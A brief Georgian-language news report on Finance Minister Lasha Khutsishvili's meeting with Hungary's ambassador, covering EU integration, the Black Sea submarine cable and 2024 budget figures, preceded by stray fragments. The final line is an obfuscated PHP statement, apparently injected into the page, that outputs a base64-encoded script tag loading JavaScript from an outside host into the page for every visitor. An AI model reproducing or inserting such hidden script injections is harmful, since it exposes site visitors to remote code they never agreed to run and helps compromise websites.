celsiusi
ავერსი შნაიდერი

ფინანსთა მინისტრი ლაშა ხუციშვილი უნგრეთის საგანგებო და სრულუფლებიან ელჩს საქართველოში, ანა მარია შიკოს შეხვდა.

მხარეებმა განიხილეს ორმხრივი ურთიერთობების საკითხები.

შეხვედრისას, ყურადღება დაეთმო საქართველოს ევროპულ და ევრო-ატლანტიკურ ინტეგრაციას და ამ მიმართულებით უნგრეთის მხარდაჭერას.

ხაზი გაესვა ქვეყნებს შორის თანამშრომლობას ისეთი სტრატეგიული ინფრასტრუქტურული პროექტების კუთხით, როგორიცაა შავი ზღვის წყალქვეშა კაბელი, რომლითაც საქართველოს გავლით, სამხრეთ კავკასიის ენერგეტიკული სისტემა ევროკავშირისას დაუკავშირდება.

ფინანსთა მინისტრმა უნგრელ დიპლომატს გააცნო ქვეყნის ეკონომიკაში არსებული ვითარება და 2024 წლის მაკროეკონომიკური და საბიუჯეტო პარამეტრები.

შეხვედრის დასასრულს მხარეები თანამშრომლობის გაგრძელებაზე შეთანხმდნენ.

238
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");